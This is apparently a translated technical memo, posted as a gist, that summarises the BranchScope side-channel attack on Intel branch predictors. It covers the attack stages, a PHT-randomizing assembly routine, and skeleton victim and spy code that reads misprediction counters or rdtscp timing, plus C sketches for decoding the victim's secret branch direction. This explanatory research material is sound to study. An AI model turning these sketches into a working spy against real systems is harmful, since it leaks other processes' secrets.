BranchScope Article memo by herumi

Original here, just run through Google Translate and fixed formatting.

Whitepaper: BranchScope: A New Side-Channel Attack on Directional Branch Predictor

Caution: I still do not understand the essential parts

I might update this memo (though I may not dig any deeper, because the conditions required for the attack are so severe that it seems impossible in ordinary situations)

Overview

BranchScope: a side-channel attack that infers the direction of an arbitrary conditional branch by manipulating the shared directional branch predictor
Here the direction of a branch means the prediction of whether it will be taken (Taken) or not taken (Not taken)
It differs from existing attacks that use the BTB (branch target buffer)
The BTB is a buffer that records the targets of previously executed branches
Can be executed in user space
The error rate is 1% or less
Is an attack against SGX also possible?

Branch prediction unit (BPU)

BPU: predicts the outcome of conditional branches
It consists mainly of two kinds of elements
- L1 (1-level) prediction
  - PHT (pattern history table) of 2-bit saturating counters
    - Bimodal prediction indexed by the program counter (pc)
- gshare-style L2 (2-level) prediction
  - Prediction that uses past information (branch history) in addition to the branch address
The final prediction takes both predictions into account
- This attack uses only L1 prediction
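
To make the difference between the two predictors concrete, here is a minimal sketch in C of how each one might select a PHT entry. The table size (`PHT_BITS`), the function names and the exact hash are assumptions for illustration only; the real index functions of Intel CPUs are not documented. The textbook gshare scheme XORs the branch address with a global history register, which is what the sketch uses.

```c
#include <stdint.h>

/* Hypothetical table size: 2^PHT_BITS entries (an assumption, not a measured value). */
#define PHT_BITS 14
#define PHT_MASK ((1u << PHT_BITS) - 1u)

/* L1 (bimodal) prediction: the entry depends only on the branch address. */
uint32_t l1_index(uint64_t pc) {
    return (uint32_t)(pc & PHT_MASK);
}

/* gshare-style L2 prediction: the entry also depends on the global history
 * of recent branch outcomes (textbook gshare: address XOR history). */
uint32_t gshare_index(uint64_t pc, uint32_t global_history) {
    return (uint32_t)((pc ^ global_history) & PHT_MASK);
}

/* Shift the newest outcome (1 = taken, 0 = not taken) into the history. */
uint32_t update_history(uint32_t global_history, int taken) {
    return ((global_history << 1) | (taken ? 1u : 0u)) & PHT_MASK;
}
```

With L1 prediction, two branches at colliding addresses always share an entry. With gshare the entry also moves with the history, which is why the attack first tries to get L2 prediction out of the way.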

Attack model

Characters

victim: holds the confidential information
spy (attacker): steals the information without directly accessing the secret

Conditions

victim and spy run on the same physical core
- So that they share the BPU
victim runs slowly
- The victim's program must run slowly for a high-precision BranchScope attack
  - Slow it down with another attack (a performance degradation attack, etc.)
  - Or manipulate the scheduler
The timing of the victim's code execution can be controlled

Attack Summary

Stage 1: Initialize (prime) the PHT entry
- The attacker brings the PHT entry into a known state
- spy executes the code described later
Stage 2: Run victim
- Execute only one conditional branch (?)
Stage 3: Probe the PHT entry
- spy executes a conditional branch that maps to the same PHT entry as the one used by victim, and observes the prediction result

Attack possibility

First, force the predictor to use L1 prediction only
How?
In a branch prediction experiment, the misprediction rate is about 50% on the first execution, drops to about 10% by the 3rd or 4th execution, and becomes almost 0% by the 5th to 7th
Since no L2 prediction information exists for a branch in the initial state, L1 prediction is used

randomize_pht:
  cmp %rcx, %rcx
  je .L0
  nop
.L0:
  jne .L1
  nop
.L1:
  je .L2
  ...
.L99999:
  nop
* je and jne are chosen randomly
* The pattern is repeated 100000 times
* Experimental result: after this, L2 prediction is no longer used
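
Writing 100000 branches by hand is impractical, so a listing like this is presumably generated. Below is a minimal sketch of such a generator in C. The function name `emit_randomize_pht`, the use of `rand()` and the trailing `ret` are assumptions of this sketch, not something the memo or the paper specifies.

```c
#include <stdio.h>
#include <stdlib.h>

/* Write an AT&T-syntax randomize_pht routine with n_branches conditional
 * branches to `out`. Each branch is je or jne, chosen pseudo-randomly.
 * cmp %rcx, %rcx always sets ZF, so je is always taken and jne never is;
 * nop does not change the flags in between. */
void emit_randomize_pht(FILE *out, unsigned n_branches, unsigned seed) {
    srand(seed);
    fprintf(out, "randomize_pht:\n");
    fprintf(out, "  cmp %%rcx, %%rcx\n");
    for (unsigned k = 0; k < n_branches; k++) {
        const char *jcc = (rand() & 1) ? "je" : "jne";
        fprintf(out, "  %s .L%u\n", jcc, k);
        fprintf(out, "  nop\n");
        fprintf(out, ".L%u:\n", k);
    }
    /* Assumption: the memo's listing does not show how the routine ends. */
    fprintf(out, "  ret\n");
}
```

Calling `emit_randomize_pht(stdout, 100000, 1)` prints a listing of the same shape as the one above. Directives such as `.globl` are left out, so the output would still need a little wrapping before it can be linked against C code.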

# 2-bit FSM (finite state machine) used by L1 prediction

* T: taken (the branch is taken)
* N: not taken (the branch is not taken)
* H: branch prediction success (hit)
* M: branch prediction failure (miss)
* SN: strongly not taken
* WN: weakly not taken
* ST: strongly taken
* WT: weakly taken

Each T moves the state one step to the right and each N moves it one step to the left, saturating at both ends:

SN → WN → WT → ST (on T)
SN ← WN ← WT ← ST (on N)
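
The state machine is small enough to write down directly. The following is a minimal sketch of the textbook 2-bit saturating counter in C; the names `pht_state`, `pht_predict` and `pht_update` are made up for this illustration, and real hardware may deviate from the textbook behavior.

```c
/* States of the 2-bit saturating counter, ordered so that +1 means
 * "one step toward taken". */
enum pht_state { SN = 0, WN = 1, WT = 2, ST = 3 };

/* Predicted direction for a state: 1 = taken, 0 = not taken. */
int pht_predict(enum pht_state s) {
    return s >= WT;
}

/* Next state after the branch actually resolves (1 = taken, 0 = not taken). */
enum pht_state pht_update(enum pht_state s, int taken) {
    if (taken)
        return s == ST ? ST : (enum pht_state)(s + 1);
    return s == SN ? SN : (enum pht_state)(s - 1);
}
```

Three consecutive T outcomes reach ST from any starting state, and three N outcomes reach SN, which is why priming with TTT or NNN puts the entry into a known state.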

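| Prime | State after Prime | Target | State after Target | Probe | Observation |
| --- | --- | --- | --- | --- | --- |
| TTT | ST | T | ST | TT | HH |
| TTT | ST | T | ST | NN | MM |
| TTT | ST | N | WT | TT | HH |
| TTT | ST | N | WT | NN | MH |
| NNN | SN | T | WN | TT | MH |
| NNN | SN | T | WN | NN | HH |
| NNN | SN | N | SN | TT | MM |
| NNN | SN | N | SN | NN | HH |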

If probing with TT gives HH and probing with NN gives MM, you can infer that the state after Target was ST
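
The rows of the table can be reproduced by simulating prime, target and probe on a textbook 2-bit counter. The sketch below does that in C and adds a decoder for one prime/probe combination. All function names are hypothetical, and the model is the idealized FSM, not a measured CPU.

```c
#include <string.h>

enum pht_state { SN = 0, WN = 1, WT = 2, ST = 3 };

/* Execute one branch against the counter: returns 'H' on a correct
 * prediction, 'M' on a misprediction, and advances the state. */
char run_branch(enum pht_state *s, int taken) {
    int predicted = (*s >= WT);
    taken = (taken != 0);
    if (taken && *s != ST) *s = (enum pht_state)(*s + 1);
    if (!taken && *s != SN) *s = (enum pht_state)(*s - 1);
    return predicted == taken ? 'H' : 'M';
}

/* Prime with three identical branches, run the victim's branch once,
 * then probe twice; obs receives the two-letter observation. */
void prime_target_probe(int prime_dir, int target_dir, int probe_dir,
                        char obs[3]) {
    enum pht_state s = WN;               /* arbitrary start; priming saturates it */
    for (int k = 0; k < 3; k++)
        run_branch(&s, prime_dir);       /* stage 1: prime */
    run_branch(&s, target_dir);          /* stage 2: victim */
    obs[0] = run_branch(&s, probe_dir);  /* stage 3: probe */
    obs[1] = run_branch(&s, probe_dir);
    obs[2] = '\0';
}

/* Decode the victim's direction (1 = taken, 0 = not taken) for the
 * "prime TTT, probe NN" rows: MM means taken, MH means not taken.
 * Returns -1 for any other observation (treated as noise). */
int decode_ttt_nn(const char *obs) {
    if (strcmp(obs, "MM") == 0) return 1;
    if (strcmp(obs, "MH") == 0) return 0;
    return -1;
}
```

In this model only two combinations separate the victim's directions: prime TTT with probe NN (MM vs MH) and prime NNN with probe TT (MH vs MM). Probing in the same direction as the prime gives HH either way.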

State of branch prediction

There is quite a lot of noise when the distribution is examined
Looking at the PHT entries in detail, branch addresses whose lower 14 bits match seem to use the same entry (are the lower 14 bits used as the key?)
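
If that guess is right, checking whether two branches collide is a one-line mask comparison. A small sketch in C, where `PHT_KEY_BITS` encodes the memo's unconfirmed 14-bit hypothesis and `same_pht_entry` is a name invented here:

```c
#include <stdint.h>

#define PHT_KEY_BITS 14  /* hypothesis from the memo, not a confirmed value */

/* Nonzero if both branch addresses would select the same PHT entry
 * under the "lower 14 bits are the key" hypothesis. */
int same_pht_entry(uint64_t addr_a, uint64_t addr_b) {
    uint64_t mask = (UINT64_C(1) << PHT_KEY_BITS) - 1;
    return (addr_a & mask) == (addr_b & mask);
}
```

For example, addresses `0x401234` and `0x405234` differ by `0x4000` and would collide, while `0x401234` and `0x401235` would not.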

Implementation

victim code

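int sec_data[] = {1, 0, 1, ...};  /* secret bits; the rest is elided in the memo */
int i = 0;                        /* index of the next secret bit */

void victim() {
  if (sec_data[i])                /* the conditional branch under attack */
    asm("nop; nop");
  i++;
}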

spy code

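int probe_array[] = {1, 1};

void spy(int array[2]);

int main()
{
  randomize_pht();     /* stage 1 */
  sleep();             /* wait for victim (stage 2); pseudocode, no duration given */
  spy(probe_array);    /* stage 3 */
}

void spy(int array[2]) {
  for (int i = 0; i < 2; i++) {
    int a = read_branch_mispred_counter();
    if (array[i])      /* probe branch, placed to collide with the victim's branch */
      asm("nop; nop; nop");
    int b = read_branch_mispred_counter();
    store_branch_mispred_data(b - a);  /* 0 = hit, 1 = miss */
  }
}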

spy can force victim's process to execute only one conditional branch instruction between context switches
- This is assumed because the OS is under the attacker's control in the SGX scenario
The virtual addresses of victim's conditional branch instruction and spy's conditional branch instruction are set to the same value
- So that victim and spy collide in the PHT
spy executes randomize_pht() and sleep()
victim() executes a conditional branch only once, depending on the confidential information, and then stops
spy reads the branch misprediction counter and branches based on array[]
spy reads the branch misprediction counter again to see whether the value is unchanged or incremented by 1

Experimental results

Skylake and Haswell: error rate below 1%
Sandy Bridge: error rate of 3 to 5%

Time stamp counter

Elevated privileges are required to access the branch misprediction counter
Use rdtsc(p) as a substitute
- A branch misprediction costs an extra 20 cycles, so it can be detected from the timing
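
As a rough illustration of the timing variant, the sketch below times a single conditional branch with `__rdtscp` from `<x86intrin.h>` and classifies the result against a baseline. The helper names, the `MISPREDICT_MARGIN` threshold and the `clock()` fallback for non-x86 builds are assumptions of this sketch. A real measurement would need calibration and many repetitions because of noise.

```c
#include <stdint.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
/* rdtscp waits for earlier instructions to finish before reading the counter. */
uint64_t read_cycles(void) {
    unsigned int aux;
    return __rdtscp(&aux);
}
#else
#include <time.h>
/* Fallback so the sketch compiles elsewhere; far too coarse for a real attack. */
uint64_t read_cycles(void) {
    return (uint64_t)clock();
}
#endif

/* Assumption: half of the roughly 20-cycle penalty mentioned above. */
#define MISPREDICT_MARGIN 10

/* Time one conditional branch, in the style of the spy's probe branch. */
uint64_t time_branch(volatile int *cond) {
    uint64_t start = read_cycles();
    if (*cond)
        __asm__ volatile("nop; nop; nop");
    uint64_t end = read_cycles();
    return end - start;
}

/* Nonzero if the measured time is clearly above a baseline measured
 * for a correctly predicted branch. */
int looks_mispredicted(uint64_t cycles, uint64_t hit_baseline) {
    return cycles > hit_baseline + MISPREDICT_MARGIN;
}
```

The baseline would have to be measured on the target machine, for instance by timing the same branch after it has been trained in one direction.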

avelardi/branchscope-en.md

tarqd commented May 4, 2018

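| Prime | State after Prime | Target | State after Target | Probe | Observation |
| --- | --- | --- | --- | --- | --- |
| TTT | ST | T | ST | TT | HH |
| TTT | ST | T | ST | NN | MM |
| TTT | ST | N | WT | TT | HH |
| TTT | ST | N | WT | NN | MH |
| NNN | SN | T | WN | TT | MH |
| NNN | SN | T | WN | NN | HH |
| NNN | SN | N | SN | TT | MM |
| NNN | SN | N | SN | NN | HH |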
